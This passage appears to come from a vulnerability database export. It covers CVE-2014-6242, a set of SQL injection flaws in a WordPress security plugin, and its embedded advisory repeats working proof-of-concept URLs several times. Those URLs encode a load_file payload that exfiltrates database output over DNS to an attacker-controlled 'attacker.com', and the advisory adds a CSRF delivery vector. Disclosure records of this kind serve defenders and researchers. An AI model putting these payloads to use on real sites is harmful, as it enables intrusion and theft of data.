            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/"
          },
          {
            "trust": 0.3,
            "url": "http://jvndb.jvn.jp/en/contents/2015/jvndb-2015-000037.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.wordpress.org/"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "date": "2015-05-06T00:00:00",
            "db": "BID",
            "id": "74856"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "date": "2015-03-07T02:59:01.537000",
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "date": "2015-05-06T00:00:00",
            "db": "BID",
            "id": "74856"
          },
          {
            "date": "2015-03-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All In One WP Security \u0026 Firewall vulnerable to SQL injection",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201410-1086

    Vulnerability from variot - Updated: 2025-04-13 23:21

    Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party can SQL The command may be executed. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. All In One WP Security & Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Version(s): 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 [without technical details] Vendor Notification: September 3, 2014 Vendor Patch: September 12, 2014 Public Disclosure: September 24, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-6242 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


    Advisory Details:

    High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. [2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.


    Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1086",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.8.3"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "High-Tech Bridge Security Research Lab",
        "sources": [
          {
            "db": "BID",
            "id": "70150"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-6242",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2014-6242",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-74185",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-6242",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-6242",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201410-046",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-74185",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple SQL injection vulnerabilities in the All In One WP Security \u0026 Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php.  NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party can SQL The command may be executed. \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nAll In One WP Security \u0026amp; Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231\nProduct: All In One WP Security WordPress plugin\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior\nTested Version: 3.8.2\nAdvisory Publication:  September 3, 2014  [without technical details]\nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL Injection [CWE-89]\nCVE Reference: CVE-2014-6242\nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\n\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. \n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-74185",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "IMMUNIWEB",
            "id": "HTB23231",
            "trust": 2.9
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "70150",
            "trust": 2.0
          },
          {
            "db": "PACKETSTORM",
            "id": "128419",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "34781",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046",
            "trust": 0.7
          },
          {
            "db": "XF",
            "id": "96204",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-74185",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "id": "VAR-201410-1086",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:21:24.616000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WordPress Security and Firewall Plugin",
            "trust": 0.8,
            "url": "http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://www.htbridge.com/advisory/htb23231"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/70150"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog"
          },
          {
            "trust": 1.7,
            "url": "http://www.exploit-db.com/exploits/34781"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/128419/all-in-one-wp-security-3.8.2-sql-injection.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/533519/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96204"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6242"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6242"
          },
          {
            "trust": 0.6,
            "url": "http://xforce.iss.net/xforce/xfdb/96204"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/533519/100/0/threaded"
          },
          {
            "trust": 0.4,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026order=,%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29"
          },
          {
            "trust": 0.1,
            "url": "https://www.htbridge.com/advisory/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6242"
          },
          {
            "trust": 0.1,
            "url": "http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "trust": 0.1,
            "url": "https://www.htbridge.com/immuniweb/"
          },
          {
            "trust": 0.1,
            "url": "http://cwe.mitre.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29\"\u003e"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-10-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "date": "2014-09-24T00:00:00",
            "db": "BID",
            "id": "70150"
          },
          {
            "date": "2014-10-24T00:00:00",
            "db": "JVNDB",
